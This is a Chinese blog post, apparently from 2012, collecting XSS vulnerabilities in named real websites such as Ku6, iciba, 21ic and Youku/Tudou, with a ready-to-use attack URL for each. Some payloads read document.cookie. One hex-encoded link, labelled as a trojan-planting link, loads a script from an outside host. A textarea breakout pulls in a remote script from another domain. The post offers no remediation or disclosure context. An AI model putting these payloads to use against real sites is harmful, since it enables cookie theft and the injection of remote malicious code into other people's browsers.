不灭的焱

革命尚未成功,同志仍须努力下载JDK17

XSS实战,XSS漏洞网站收集
作者:Albert.Wen  添加时间:2012-06-28 10:46:18  修改时间:2024-05-09 12:01:46  分类:编程基础/Web安全  编辑

1.酷6非持久XSS:

测试地址:http://boke.ku6.com/18543574?mode=2&view=1&keywords=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

挂马地址:http://boke.ku6.com/18543574?mode=2&view=1&keywords=%3C%73%63%72%69%70%74%2F%73%72%63%3D%2F%2F%32%2E%67%79%2F%65%68%41%4D%3E


 

2.必途网:

测试地址:http://search.b2b.cn/product/?k=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E


 

3.金山爱词霸:

非持久性:http://www.iciba.com/search?s=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E

同时存在持久型XSS



 

4.21IC.com 中国电子网:

测试地址:http://search.21ic.com/so.php?keyword=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E


 

5.中华电源网:

测试地址:http://www.power-cn.cn/sample/search.asp?txtitle=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E

6.优酷+土豆XSS:

土豆没有做服务端过滤,导致了存储型XSS。

1>. 绕过代码:

</textarea><script src=http://tmxk.org/m/q.js></script>


 

2>. 土豆播客因编辑器原因可插入代码:


 

3>. 优酷有同样的毛病:


 

Copyright © 2012-2035 不灭的焱 版权所有 粤ICP备17073848号